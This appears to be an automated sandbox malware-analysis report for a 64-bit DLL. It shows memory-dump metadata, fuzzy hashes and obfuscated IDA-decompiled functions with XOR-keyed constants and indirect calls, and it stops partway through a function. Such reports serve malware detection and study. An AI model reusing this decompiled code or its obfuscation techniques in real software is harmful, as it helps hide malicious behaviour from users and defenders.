                                0x7ffc131010f1
                                0x7ffc131010f7
                                0x7ffc13101103
                                0x7ffc13101108
                                0x7ffc1310110d
                                0x7ffc13101113
                                0x7ffc13101126
                                0x7ffc1310112a
                                0x7ffc13101143
                                0x7ffc13101148
                                0x7ffc1310114f
                                0x7ffc13101156
                                0x7ffc13101161
                                0x7ffc1310116f
                                0x7ffc13101178
                                0x7ffc13101182
                                0x7ffc1310118f
                                0x7ffc13101192
                                0x7ffc13101198
                                0x7ffc1310119d
                                0x7ffc131011ab
                                0x7ffc131011b9
                                0x7ffc131011e4
                                0x7ffc131011ec
                                0x7ffc131011ef
                                0x7ffc131011f3
                                0x7ffc131011fa
                                0x7ffc1310121e
                                0x7ffc13101226
                                0x7ffc1310122e
                                0x7ffc1310123b
                                0x7ffc13101250
                                0x7ffc13101260
                                0x7ffc13101269
                                0x7ffc1310126d
                                0x7ffc13101270
                                0x7ffc1310127b
                                0x7ffc13101285
                                0x7ffc1310128e
                                0x7ffc13101297
                                0x7ffc1310129e
                                0x7ffc131012a0
                                0x7ffc131012a9
                                0x7ffc131012ba
                                0x7ffc131012c2
                                0x7ffc131012c6
                                0x7ffc131012d6
                                0x7ffc131012dd
                                0x7ffc131012e4
                                0x7ffc131012e6
                                0x7ffc13101308
                                0x7ffc13101316
                                0x7ffc13101321
                                0x7ffc1310133f
                                0x7ffc13101346
                                0x7ffc1310134d
                                0x7ffc13101354
                                0x7ffc1310135b
                                0x7ffc1310137b
                                0x7ffc1310137e
                                0x7ffc13101397
                                0x7ffc1310139b
                                0x7ffc131013a8
                                0x7ffc131013b6
                                0x7ffc131013be
                                0x7ffc131013ca
                                0x7ffc131013d1
                                0x7ffc131013dd
                                0x7ffc131013e7
                                0x7ffc131013eb
                                0x7ffc131013ef
                                0x7ffc1310140e
                                0x7ffc13101418
                                0x7ffc13101438

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: }Ux;
                                • API String ID: 0-2223722972
                                • Opcode ID: 642c962a0b806545a7463cc6ba01dbab3d006ed2b32fc2925106f0bfd09a13b8
                                • Instruction ID: a1c7f16a9adfeb94717820456cbda86f7bee642cb4401bb46ba5a29210515bdc
                                • Opcode Fuzzy Hash: 642c962a0b806545a7463cc6ba01dbab3d006ed2b32fc2925106f0bfd09a13b8
                                • Instruction Fuzzy Hash: EF02E576A08AE585F720CB26E8407797BB1F759799F254132EA8D63765CF3CE120CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E00007FFC7FFC130F98F0(void* __ecx, void* __rax, void* __rdx, signed int __r8, void* __r9, long long __r13) {
                                				void* __rbx;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t197;
                                				unsigned int _t241;
                                				signed int _t250;
                                				void* _t280;
                                				void* _t281;
                                				signed int _t294;
                                				intOrPtr _t297;
                                				void* _t304;
                                				signed long long _t315;
                                				signed long long _t319;
                                				signed long long _t321;
                                				signed long long _t329;
                                				void* _t333;
                                				intOrPtr _t334;
                                				void* _t335;
                                				void* _t336;
                                				void* _t337;
                                				signed long long _t341;
                                				intOrPtr* _t342;
                                				signed long long _t344;
                                				intOrPtr _t349;
                                				intOrPtr _t350;
                                				intOrPtr _t352;
                                				void* _t356;
                                				signed long long _t359;
                                
                                				r14d = __r9 + 0x1249;
                                				r9d =  *(_t337 + 0x118);
                                				 *((intOrPtr*)(_t337 + 0x80)) = __ecx + 0xffffd84e;
                                				r9d = r9d + 0xfd2;
                                				 *(_t337 + 0x88) = r14d;
                                				r10d = __rax - 0x27b2;
                                				 *(_t337 + 0xd0) = __rdx - 0x36e7;
                                				 *(_t337 + 0xe8) = r10d;
                                				r11d = __rdx - 0x114f;
                                				 *(_t337 + 0xe0) = r11d;
                                				 *(_t337 + 0xf8) = __rdx - 0x2ad;
                                				 *((intOrPtr*)(_t337 + 0xf0)) =  *((intOrPtr*)(_t337 + 0xf0)) + 0xc8c;
                                				 *(_t337 + 0x100) = __r8 - 0x27ae;
                                				 *(_t337 + 0x84) = __rax + 0x113b;
                                				if (r9d - __rdx - 0xf35 < 0) goto 0x130f9cf0;
                                				_t319 =  *((intOrPtr*)(_t337 + 0x110));
                                				if ( *((long long*)(_t319 + 0x258)) == 0) goto 0x130f9cd6;
                                				_t334 =  *((intOrPtr*)(_t319 + 0x118));
                                				r11d = 0;
                                				_t352 =  *((intOrPtr*)(_t319 + 0x30));
                                				r8d = 0x2598;
                                				 *(_t319 + 0x1e0) = 0x3189;
                                				_t336 = _t335 +  *((intOrPtr*)(_t319 + 0xc0));
                                				if ( *((intOrPtr*)(_t352 + 0x150)) + 0x1a3 - r8d <= 0) goto 0x130f9a49;
                                				asm("o16 nop [eax+eax]");
                                				r8d = r8d + 1;
                                				 *(_t319 + 0x198) =  *(_t319 + 0x198) + 0x2103 +  *((intOrPtr*)(_t319 + 0x188));
                                				if (r8d - __rdx < 0) goto 0x130f9a20;
                                				if ( *((intOrPtr*)(_t334 + 0xb4)) - r11d <= 0) goto 0x130f9c9b;
                                				asm("o16 nop [eax+eax]");
                                				 *(_t319 + 0xa0) =  *(_t319 + 0xa0) | 0x00006be2;
                                				 *(_t319 + 0x120) =  *(_t319 + 0x120) * 0xbdda0def;
                                				r11d = r11d +  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1a0)) + 0x130)) + 0xffffdc11;
                                				if (( *( *((intOrPtr*)(_t319 + 0x140)) + 0x1d0) ^ 0x00001b1e) == 0x1f2c) goto 0x130f9ad2;
                                				 *( *_t319 + 0x1f0) =  *( *_t319 + 0x1f0) ^ _t323 - 0x00003595;
                                				_t349 =  *((intOrPtr*)(_t319 + 0x1c0));
                                				r10d = r11d;
                                				r8d =  *( *((intOrPtr*)(_t319 + 0x1c8)) + 0x188);
                                				_t341 =  *((intOrPtr*)(_t349 + 0x150)) - 0x3595;
                                				 *(_t319 + 0x198) =  *(_t319 + 0x198) * _t341;
                                				 *((intOrPtr*)(_t319 + 0x28)) =  *((intOrPtr*)(_t319 + 0x28)) + _t349 + 0x18;
                                				r8d =  *( *((intOrPtr*)(_t319 + 0x140)) + 0x60);
                                				r8d = r8d ^ 0x0000329d;
                                				if (r8d -  *(_t333 + _t336 + 4) / (__r8 ^ 0x00002031) >= 0) goto 0x130f9c83;
                                				_t294 =  *(_t319 + 0x120);
                                				 *((intOrPtr*)(_t319 + 0xa8)) =  *((intOrPtr*)(_t319 + 0xa8)) + _t294;
                                				_t329 =  *(_t319 + 0x1e0);
                                				 *((long long*)(_t319 + 0x1f0)) = 0x259b;
                                				 *(_t319 + 0x120) = _t294 - 1;
                                				if ( *((intOrPtr*)(_t319 + 0x60)) - _t329 < 0) goto 0x130f9b9b;
                                				 *(_t319 + 0x198) = 0x37fd;
                                				_t350 =  *((intOrPtr*)(_t319 + 0x1c8));
                                				r11d = r11d + ( *(_t350 + 0x130) ^ 0x000023f5);
                                				 *(_t319 + 0x18) =  *(_t319 + 0x100) * 0x2103;
                                				_t297 =  *((intOrPtr*)(_t319 + 0x150));
                                				_t280 = _t297 - 0x27b2;
                                				if (_t280 <= 0) goto 0x130f9bd9;
                                				 *((intOrPtr*)(_t319 + 0x48)) =  *((intOrPtr*)(_t319 + 0x48)) + _t297 + 0xffffd84e;
                                				 *(_t319 + 0x1e0) = _t329 | "y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard struck pigeon branches persuade stretch previous mute frail flank cone winner combination plane wander sack children traverse skip probability plays dagger midst throne whip final particles trick compassion selling replacement prospect even relay between quarter beg monks yell speedometer dam ";
                                				_t241 =  *(_t352 + _t336 + r8d * 2) & 0x0000ffff;
                                				r8d = _t241;
                                				r8d = r8d & 0x00000fff;
                                				r8d = r8d +  *((intOrPtr*)(_t333 + _t336));
                                				if (_t280 == 0) goto 0x130f9c64;
                                				if (_t280 == 0) goto 0x130f9c15;
                                				if (_t280 == 0) goto 0x130f9c0c;
                                				_t281 = (_t241 >> 0xc) - 0xffffffffffffffff - 7;
                                				if (_t281 != 0) goto 0x130f9c75;
                                				goto 0x130f9c6b;
                                				 *((long long*)(_t350 + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198));
                                				 *((long long*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198)) =  *((long long*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198)) - 1;
                                				 *((intOrPtr*)(_t319 + 0x90)) =  *((intOrPtr*)(_t319 + 0x90)) +  *((intOrPtr*)(_t319 + 0x30)) + 0x90;
                                				_t304 =  *_t319;
                                				 *(_t319 + 0x20) =  *(_t304 + 0x1b8) * 0x228c;
                                				goto 0x130f9c6b;
                                				_t342 = _t341 +  *((intOrPtr*)(_t319 + 0xc0));
                                				 *_t342 =  *_t342 + _t304;
                                				if (_t281 != 0) goto 0x130f9b60;
                                				 *(_t319 + 0x1e0) =  *(_t319 + 0x1e0) ^ 0x0000228c;
                                				if (r11d -  *((intOrPtr*)(_t334 + 0xb4)) < 0) goto 0x130f9a70;
                                				r8d = 0x343a;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1c8)) + 0x1e0)) =  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1c8)) + 0x1e0)) + _t342 -  *_t319;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x40)) + 0x130)) == 0x10ee) goto 0x130f9cd6;
                                				 *(_t319 + 0x1e0) =  *(_t319 + 0x1e0) ^ ( *(_t319 + 0x110) | 0x00003595);
                                				 *((long long*)(_t319 + 0x248)) = _t319 + 0x160;
                                				goto 0x130f9f68;
                                				r8d = 0x2598;
                                				 *((long long*)(_t337 + 0xd8)) = __r13;
                                				_t359 =  *((intOrPtr*)(_t337 + 0x110));
                                				r12d =  *(_t359 + 0x188);
                                				r15d =  *(_t359 + 0x140);
                                				 *(_t359 + 0x120) =  *(_t359 + 0x120) - ( *(_t359 + 0x1f0) &  *(_t359 + 0x20));
                                				r15d = r15d & r10d;
                                				r15d = r15d *  *(_t359 + 0x1a0);
                                				r14d =  *(_t359 + 0x20);
                                				r11d = r10d;
                                				r11d = r11d | r8d;
                                				 *(_t337 + 0x100) =  *(_t337 + 0x100) -  *((intOrPtr*)(_t359 + 0x48));
                                				r11d = r11d & r12d;
                                				r8d =  *(_t337 + 0xf8);
                                				r8d = r8d -  *((intOrPtr*)(_t359 + 0x1e0));
                                				r12d = r12d |  *(_t337 + 0xe0);
                                				r9d =  *(_t337 + 0x100);
                                				r14d = r14d | 0x000038e9;
                                				 *(_t337 + 0x70) = r15d;
                                				 *(_t337 + 0x68) = r14d;
                                				 *(_t337 + 0x60) =  *(_t359 + 0x1b8) - r11d + r11d;
                                				 *(_t359 + 0xe8) =  *(_t359 + 0xe8) * _t319;
                                				_t197 =  *(_t337 + 0xd0);
                                				r10d = _t197;
                                				r12d = r12d + _t197;
                                				r10d = r10d | 0x000037e1;
                                				 *(_t337 + 0x58) = ( *(_t359 + 0x200) & __rax - 0x000003bc - r8d) * _t197;
                                				 *(_t337 + 0x50) = r12d - r10d;
                                				 *(_t337 + 0x48) =  *(_t359 + 0xc8) * _t197;
                                				 *(_t337 + 0x40) = r11d;
                                				 *(_t337 + 0x38) = r10d;
                                				 *(_t337 + 0x30) = r8d;
                                				_t344 = _t359;
                                				 *(_t337 + 0x28) = r12d;
                                				 *((intOrPtr*)(_t337 + 0x20)) =  *((intOrPtr*)(_t359 + 0x130)) -  *((intOrPtr*)(_t359 + 0x80));
                                				E00007FFC7FFC130E9BA0( *(_t359 + 0xe8) * _t319, _t319,  *(_t304 + 0x1b8) * 0x228c, _t344,  &((_t352 + _t336 + r8d * 2)[1]), _t356);
                                				r8d = 0x343a;
                                				r9d =  *(_t337 + 0xf8);
                                				_t321 =  *(_t359 + 0x1f8) * 0x00001f2c & _t344;
                                				r9d = r9d *  *(_t359 + 0x120);
                                				r12d =  *(_t359 + 0x1c0);
                                				_t250 =  *(_t337 + 0x118) + 0xfffffe29 +  *(_t359 + 0xd8) * 0x30d5;
                                				r15d = _t250;
                                				r14d =  *(_t359 + 0x1c8);
                                				r15d = r15d & 0x000030d5;
                                				_t315 =  *(_t359 + 0x1b8) * _t321;
                                				r9d = r9d ^ 0x00003666;
                                				 *(_t359 + 0x1b8) = _t315;
                                				r8d =  *(_t337 + 0xe8);
                                				r11d = _t321 + _t315;
                                				r10d = _t250;
                                				r10d = r10d ^ 0x000027b2;
                                				r10d = r10d *  *(_t359 + 0x1b0);
                                				r12d = r12d &  *(_t337 + 0x84);
                                				 *(_t337 + 0x60) = r15d;
                                				 *(_t337 + 0x58) = r9d;
                                				 *(_t337 + 0x50) = r12d * r8d;
                                				 *(_t337 + 0x48) =  *(_t359 + 0x188) - r8d +  *_t359;
                                				 *(_t337 + 0x40) =  *((intOrPtr*)(_t359 + 0x100)) -  *((intOrPtr*)(_t359 + 0x1d0)) + 0x329d;
                                				 *(_t337 + 0x38) = r11d;
                                				r8d = ( *((intOrPtr*)(_t337 + 0x80)) -  *((intOrPtr*)(_t359 + 0x70))) * 0x3666;
                                				 *(_t337 + 0x30) =  *((intOrPtr*)(_t337 + 0xf0)) + 0xffffda68 | r14d;
                                				 *(_t337 + 0x28) = r10d;
                                				 *((intOrPtr*)(_t337 + 0x20)) = r8d * 0x2103 -  *((intOrPtr*)(_t359 + 0xe0));
                                				E00007FFC7FFC130F7C20(_t323 - 0x3595 - _t323 - 1, _t321,  *(_t304 + 0x1b8) * 0x228c, _t334, _t344, _t359);
                                				return  *(_t337 + 0x88) + 0x927;
                                			}
































                                Strings
                                • y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway, xrefs: 00007FFC130F9A60
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway
                                • API String ID: 0-156379247
                                • Opcode ID: 85bbfddf9d8429de60b2b2be73729eb057ebefaedf4f10f86c3e2610b7d79d4e
                                • Instruction ID: a6203b5a00b6539abd7bfc368981bddb2d5c9738ef1796bb800b0a5a35065d33
                                • Opcode Fuzzy Hash: 85bbfddf9d8429de60b2b2be73729eb057ebefaedf4f10f86c3e2610b7d79d4e
                                • Instruction Fuzzy Hash: 3FF1CB73605AD88BD361CF19D488BDE77A8F788B88F148136DB4917B64DB39D952CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 67%
                                			E00000201201640C9D6C(void* __ebx, void* __edx, long long __rbx, long long __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11, void* _a8, signed int _a16, char _a24, char _a32) {
                                				void* _v48;
                                				intOrPtr _v56;
                                				intOrPtr _v64;
                                				signed long long _v72;
                                				char _v80;
                                				char _v88;
                                				long long _v96;
                                				signed long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				signed int _t81;
                                				long long _t155;
                                				signed long long _t156;
                                				long long _t159;
                                				long long* _t163;
                                				long long _t196;
                                				long long _t198;
                                				long long _t200;
                                				void* _t203;
                                				long long _t205;
                                				signed int* _t212;
                                				void* _t230;
                                				void* _t232;
                                				void* _t234;
                                
                                				_t231 = __r11;
                                				_t230 = __r10;
                                				_t155 = _t205;
                                				 *((long long*)(_t155 + 8)) = __rbx;
                                				r12d =  *0x640cd450;
                                				 *(_t155 + 0x20) =  *(_t155 + 0x20) & 0x00000000;
                                				_t159 = __rcx;
                                				_t163 = _t155 - 0x40;
                                				if (E00000201201640C88C8(__rcx, _t163, _t196, _t198, _t203, _t234, _t232) != 0) goto 0x640ca08e;
                                				r9d = ( *(_t159 + 0x40))[1] & 0x0000ffff;
                                				if (_t163 - __r9 + 8 <= 0) goto 0x640c9ddc;
                                				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x640c9dde;
                                				E00000201201640C4D70(r12d ^ 0xe49a1e6d, __r9 +  &(( *(_t159 + 0x40))[4]));
                                				_t200 = _t155;
                                				goto 0x640c9dde;
                                				if (_t200 == 0) goto 0x640ca084;
                                				_t13 = _t159 + 0xc0; // 0xc0
                                				_v96 = _t200;
                                				_v104 = _v104 & 0x00000000;
                                				if (E00000201201640C84E8(_t200, _t155, _t159, _t13, _v64, _t200, _t203,  *((intOrPtr*)(_t159 + 0x30)),  *((intOrPtr*)(_t159 + 0x38)), _t196, _t198) != 0) goto 0x640ca084;
                                				_t156 =  *((intOrPtr*)(_t159 + 0x28));
                                				_v72 = _t156;
                                				if (E00000201201640C91C8( *( *(_t159 + 0x40)) & 0x0000ffff, r12d ^ 0x61f25585, _t156, _t159, _t200, _v64, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0x640c9e60;
                                				_t212 =  &_a16;
                                				if (E00000201201640C672C(_v80, _v64, _t212) == 0) goto 0x640c9e60;
                                				goto 0x640c9e69;
                                				_a16 = 0;
                                				E00000201201640C908C(0xab05e147, _t156,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t156 == 0) goto 0x640c9e97;
                                				r8d = 0;
                                				_t27 = _t212 + 1; // 0x1
                                				r9d = 0;
                                				 *_t156();
                                				goto 0x640c9e9c;
                                				if (0x7f != 0x102) goto 0x640ca084;
                                				 *(_t159 + 0x64) = 0x3e8;
                                				if (E00000201201640C91C8(_t27, r12d ^ 0x64d094d6, _t156, _t159, _t200,  &_v72, _t196, _t200,  &_v80,  &_a24, __r11) != 0) goto 0x640c9eee;
                                				_v104 = _v104 & 0x00000000;
                                				r9d = 0;
                                				E00000201201640C14B8(_t156, _t159, _t159, 0x201640c34a4, _t200, _v80,  &_a24);
                                				if (E00000201201640C91C8(_t27, r12d ^ 0xdd4632ba, _t156, _t159, _t200, 0x201640c34a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0x640c9f3c;
                                				if (E00000201201640C672C(_v80, 0x201640c34a4,  &_a16) == 0) goto 0x640c9f3c;
                                				_t81 = _a16;
                                				if (_t81 == 0) goto 0x640c9f3c;
                                				 *(_t159 + 0x64) = _t81 * 0x3e8;
                                				if (E00000201201640C91C8(_t27, r12d ^ 0x705ce798, _t156, _t159, _t200, 0x201640c34a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0x640c9f7f;
                                				if (E00000201201640C672C(_v80, 0x201640c34a4,  &_a16) == 0) goto 0x640c9f7f;
                                				goto 0x640c9f88;
                                				_a16 = 0;
                                				r12d = r12d ^ 0xe5c7ba87;
                                				if (E00000201201640C91C8(_t27, r12d, _t156, _t159, _t200, 0x201640c34a4, _t196, _t200,  &_v80,  &_a24, _t231) != 0) goto 0x640c9ffa;
                                				if (E00000201201640C672C(_v80, 0x201640c34a4,  &_a32) == 0) goto 0x640c9ffa;
                                				E00000201201640C908C(0x9c66d81c, _t156,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t156 == 0) goto 0x640c9fdd;
                                				 *_t156();
                                				 *((intOrPtr*)(_t159 + 0x60)) = _a32;
                                				 *((long long*)(_t159 + 0x58)) = _t156 * 0x23c34600 + _v56;
                                				if (E00000201201640C2DC4(_t159,  &_v48,  &_v88) != 0) goto 0x640ca022;
                                				r8d = _v88;
                                				E00000201201640C7258(0, _t159, _t159, _v48, _t230);
                                				E00000201201640C908C(0xab05e147, _t156,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (_t156 == 0) goto 0x640ca051;
                                				r8d = 0;
                                				r9d = 0;
                                				r9d = r9d * 0x3e8;
                                				 *_t156();
                                				goto 0x640ca056;
                                				if (0x7f != 0) goto 0x640c9ffa;
                                				if ( *((intOrPtr*)(_t159 + 0x50)) == 0) goto 0x640ca084;
                                				E00000201201640C2874( *((intOrPtr*)( *0x640cd458 + 8)),  *((intOrPtr*)(_t159 + 0x50)), _t196,  *((intOrPtr*)(_t159 + 0x50)));
                                				HeapFree(_t203, ??);
                                				0x640ca568();
                                				asm("lock inc ecx");
                                				return 0x7f;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: Heap$Alloc$Free
                                • String ID:
                                • API String ID: 1549400367-0
                                • Opcode ID: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction ID: 01868c3aa350cdd92afb6a686f79421782ab7f5b078dfbfd09f60731c8bb310f
                                • Opcode Fuzzy Hash: 8cda5ef62eee2583e1016891d8b3408c524cec5b4a551b585b2903ac7aa30cdf
                                • Instruction Fuzzy Hash: 1891B3222047A5C3EB60DB61E84A3DA67A9E7C4B88F544012FF4D47B9EDF39C456C748
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E00007FFC7FFC130EDCAC(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                				void* _t28;
                                				signed int _t56;
                                				void* _t58;
                                				void* _t69;
                                				signed long long _t70;
                                				void* _t75;
                                				signed int* _t81;
                                				signed long long _t83;
                                				signed long long _t85;
                                				signed long long _t86;
                                				signed long long _t102;
                                				signed long long _t103;
                                				signed long long _t105;
                                				signed long long _t111;
                                				signed long long _t113;
                                				void* _t122;
                                				signed long long _t125;
                                				signed long long _t126;
                                				signed long long _t127;
                                				signed long long* _t132;
                                				void* _t133;
                                				signed long long _t137;
                                				signed long long*** _t140;
                                
                                				_t113 = __rsi;
                                				_t56 = __edx;
                                				_t69 = _t122;
                                				 *((long long*)(_t69 + 8)) = __rbx;
                                				 *((long long*)(_t69 + 0x10)) = __rbp;
                                				 *((long long*)(_t69 + 0x18)) = __rsi;
                                				 *((long long*)(_t69 + 0x20)) = __rdi;
                                				_push(_t133);
                                				_t70 =  *((intOrPtr*)(__rcx));
                                				_t140 = __rcx;
                                				_t81 =  *_t70;
                                				if (_t81 != 0) goto 0x130edce1;
                                				goto 0x130ede67;
                                				_t125 =  *0x13123760; // 0x8abfd9f97faf
                                				r12d = 0x40;
                                				_t118 =  *_t81 ^ _t125;
                                				asm("dec eax");
                                				_t83 = _t81[4] ^ _t125;
                                				asm("dec ecx");
                                				asm("dec eax");
                                				if ((_t81[2] ^ _t125) != _t83) goto 0x130edde1;
                                				_t85 = _t83 - ( *_t81 ^ _t125) >> 3;
                                				_t108 =  >  ? _t70 : _t85;
                                				_t109 = ( >  ? _t70 : _t85) + _t85;
                                				_t110 =  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85;
                                				if (( ==  ? _t70 : ( >  ? _t70 : _t85) + _t85) - _t85 < 0) goto 0x130edd60;
                                				r8d = _t133 - 0x38;
                                				E00007FFC7FFC130F0B44(_t133 - 0x20, r8d & 0x0000003f, _t58, _t85, _t118,  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85, __rsi, _t118, _t125);
                                				_t28 = E00007FFC7FFC130EE114(_t70, _t118);
                                				if (_t70 != 0) goto 0x130edd88;
                                				_t111 = _t85 + 4;
                                				r8d = 8;
                                				E00007FFC7FFC130F0B44(_t28, 0, _t58, _t85, _t118, _t111, _t113, _t118, _t125);
                                				_t137 = _t70;
                                				E00007FFC7FFC130EE114(_t70, _t118);
                                				if (_t137 == 0) goto 0x130edcd9;
                                				_t126 =  *0x13123760; // 0x8abfd9f97faf
                                				_t132 = _t137 + _t85 * 8;
                                				_t86 = _t137 + _t111 * 8;
                                				asm("dec eax");
                                				_t75 =  >  ? _t113 : _t86 - _t132 + 7 >> 3;
                                				if (_t75 == 0) goto 0x130edde1;
                                				 *_t132 = _t113 ^ _t126;
                                				if (_t113 + 1 != _t75) goto 0x130eddcb;
                                				_t127 =  *0x13123760; // 0x8abfd9f97faf
                                				asm("dec eax");
                                				 *_t132 =  *(_t140[1]) ^ _t127;
                                				_t102 =  *0x13123760; // 0x8abfd9f97faf
                                				asm("dec eax");
                                				 *( *( *_t140)) = _t137 ^ _t102;
                                				_t103 =  *0x13123760; // 0x8abfd9f97faf
                                				asm("dec ecx");
                                				( *( *_t140))[1] =  &(_t132[1]) ^ _t103;
                                				_t105 =  *0x13123760; // 0x8abfd9f97faf
                                				r12d = r12d - (_t56 & 0x0000003f);
                                				asm("dec eax");
                                				( *( *_t140))[2] = _t86 ^ _t105;
                                				return 0;
                                			}

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 6a2f00e78af9205e3927e894e094624766f0c97d95118ad37cd236d1ad0ae9d3
                                • Instruction ID: 05fd437973813a399ba14184f96387c7638061e75d2e8623e05c0e5263f0fdbc
                                • Opcode Fuzzy Hash: 6a2f00e78af9205e3927e894e094624766f0c97d95118ad37cd236d1ad0ae9d3
                                • Instruction Fuzzy Hash: 4941B272718F688AEE04CF2AD9241A9B3A1F748FD8B599036DE0D97794DE3CD452C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 56%
                                			E00000201201640CA918(void* __eflags, void* __rax, long long __rbx, long long __rcx, void* __rdx, void* __r9, void* __r10, void* __r11, void* _a8, long long _a16, intOrPtr _a24) {
                                				void* _v60;
                                				void* _v64;
                                				intOrPtr _v68;
                                				void* _v72;
                                				void* _v76;
                                				intOrPtr _v80;
                                				intOrPtr _v84;
                                				void* _v88;
                                				intOrPtr _v92;
                                				void* _v96;
                                				intOrPtr _v100;
                                				void* _v104;
                                				void* _v108;
                                				void* _v112;
                                				intOrPtr _v116;
                                				intOrPtr _t385;
                                				signed int _t388;
                                				signed int _t567;
                                				signed int _t596;
                                				signed char* _t610;
                                				signed char* _t611;
                                				void* _t612;
                                				void* _t613;
                                				signed int* _t616;
                                				signed int* _t617;
                                				void* _t619;
                                				intOrPtr* _t620;
                                
                                				_a16 = __rbx;
                                				_a8 = __rcx;
                                				r10d =  *(__rcx + 4);
                                				r11d =  *((intOrPtr*)(__rcx + 8));
                                				_a24 =  *((intOrPtr*)(__rcx));
                                				_t610 = __rdx + 2;
                                				_t616 = _t613 - 0x40;
                                				r9d = 0x10;
                                				_t611 =  &(_t610[4]);
                                				 *_t616 = (((_t610[1] & 0x000000ff) << 0x00000008 |  *_t610 & 0x000000ff) << 0x00000008 |  *(_t611 - 5) & 0x000000ff) << 0x00000008 |  *(_t611 - 6) & 0x000000ff;
                                				_t617 =  &(_t616[1]);
                                				_t619 = __r9 - 1;
                                				if (__eflags != 0) goto 0x640ca953;
                                				r15d = _v100;
                                				r12d = _v92;
                                				asm("rol edx, 0x7");
                                				r8d = __rcx + __rbx - 0x173848aa;
                                				asm("inc ecx");
                                				r8d = r8d + __rcx + _t612 - 0x28955b88 + r10d;
                                				r9d = __rcx + __r11 + 0x242070db;
